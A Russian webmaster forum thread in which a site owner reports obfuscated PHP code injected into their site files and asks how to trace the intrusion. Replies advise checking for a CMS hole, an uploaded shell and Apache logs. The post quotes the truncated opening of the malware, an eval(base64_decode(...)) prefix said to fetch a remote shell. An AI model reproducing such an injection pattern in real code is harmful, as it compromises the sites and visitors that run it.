X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость ( Вход | Регистрация )

Открыть тему
Тема закрыта
> Вирус, versio:1.12
danisimo
danisimo
Topic Starter сообщение 11.3.2011, 16:56; Ответить: danisimo
Сообщение #1


Бывалый
****

Группа: User
Сообщений: 390
Регистрация: 8.9.2010
Поблагодарили: 65 раз
Репутация:   12  


Неделю назад заметил что на php шных файлах на сайте вставлен зашифрованый код, перед кодом файла. Начинается он так
/*versio:1.12*/if (!defined ("determinator")){eval(base64_decode('ZnVuY3Rpb24gdVAxUFFvWmZhZXpHN0xDSWVIek


и затем еще куча символов. Один блогер уже раскодировал его и выяснил что код этот пытается загрузить шел с удаленного сервер, вот только как он попадает в скрипты загадка. Точно не по фтп, потому что доступ к фтп открыт только для моего айпи.

Как бы вычислить способ изменения файла? Сервер FreeBSD-8.0. Можно ли пол логам как-нибудь посмотреть в какое время был изменен файлом , каким способом и желательно еще и с какого айпи? Спасибо.


--------------------
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
kRicha
kRicha
сообщение 11.3.2011, 17:13; Ответить: kRicha
Сообщение #2


Завсегдатай
*****

Группа: Active User
Сообщений: 932
Регистрация: 29.6.2010
Из: Киева
Поблагодарили: 222 раза
Репутация:   39  


либо дыра в вашей CMS. Либо на серваке дыра.


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
CodeNull
CodeNull
сообщение 12.3.2011, 3:34; Ответить: CodeNull
Сообщение #3


Новичок
*

Группа: User
Сообщений: 40
Регистрация: 6.3.2011
Поблагодарили: 5 раз
Репутация:   0  


Проверь права на файл в котором нашел код. Кроме доступа по ФТП могли залить шелл через дыру в движке и уже через него внедрить код. Как найдешь шелл,смотри в логах апача с каких IP им пользовались.

Сообщение отредактировал CodeNull - 12.3.2011, 3:36
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Открыть тему
Тема закрыта
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Открытая тема (нет новых ответов) Вирус на службе маркетинга
2 jack 645 9.10.2017, 19:33
автор: jack
Открытая тема (нет новых ответов) Помогите удалить вирус на joomla 1.5
Готов оплатить помощь.
5 pulsar21 2004 17.5.2013, 8:00
автор: pulsar21
Открытая тема (нет новых ответов) Найти вирус и удалить.
3 Minato 1070 2.2.2013, 20:24
автор: EvilGomel
Открытая тема (нет новых ответов) Вирус в DLE. Уничтожить за плату.
4 Seo-optimist 1789 30.12.2010, 15:23
автор: bobur
Открытая тема (нет новых ответов) вирус на сайте
5 RazBoy 2311 12.5.2010, 6:36
автор: viitalik


 



RSS Текстовая версия Сейчас: 18.12.2017, 14:55
Дизайн